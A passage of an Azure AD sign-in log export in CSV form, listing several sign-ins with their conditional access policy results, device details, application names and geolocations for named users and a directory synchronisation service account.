'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93d60bd4-ad49-40a5-9c6c-157df9f12100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d60bd4-ad49-40a5-9c6c-157df9f12100,SigninLogs,Sucess,33.0175209,35.44601059
+311,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e3a8255-e0ba-441c-b784-d44955cd86f6,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:55,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Edge 83.0.474', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",fc72e6d9-f955-4699-a5ac-65596be63100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fc72e6d9-f955-4699-a5ac-65596be63100,SigninLogs,Sucess,47.62879181,-122.0423737
+312,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,523dda1c-89ef-4870-b866-6b8a8b324b11,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",99101c3d-fa2a-42b6-a9d2-fbb9850a2400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9850a2400,SigninLogs,Sucess,36.6404686,-78.26995087
+313,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f5cbcb6-d96a-4833-858f-f6b4ccb44795,Microsoft.aadiam,Microsoft.aadiam,,Ashwin Patil,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",ad09f59c-2ec1-4ebf-90ab-0f25616e2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.28070068359376, 'latitude': 48.18001174926758}, 'state': 'Washington', 'city': 'Stanwood'}",none,none,none,none,[],{'errorCode': 0},Ashwin Patil,c402b497-b502-403f-b685-807e0d3c7584,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ad09f59c-2ec1-4ebf-90ab-0f25616e2500,SigninLogs,Sucess,48.18001175,-122.2807007
+314,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,895458ca-5565-4aad-8517-605448bd16d9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5b07faad-beec-46e1-ae61-d56dafec2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5b07faad-beec-46e1-ae61-d56dafec2500,SigninLogs,Sucess,36.6404686,-78.26995087
+315,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,523dda1c-89ef-4870-b866-6b8a8b324b11,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",99101c3d-fa2a-42b6-a9d2-fbb9850a2400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9850a2400,SigninLogs,Sucess,36.6404686,-78.26995087
+316,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,895458ca-5565-4aad-8517-605448bd16d9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5b07faad-beec-46e1-ae61-d56dafec2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5b07faad-beec-46e1-ae61-d56dafec2500,SigninLogs,Sucess,36.6404686,-78.26995087
+317,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:41.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,25bcf020-4603-445d-8479-ccebb5294c6f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 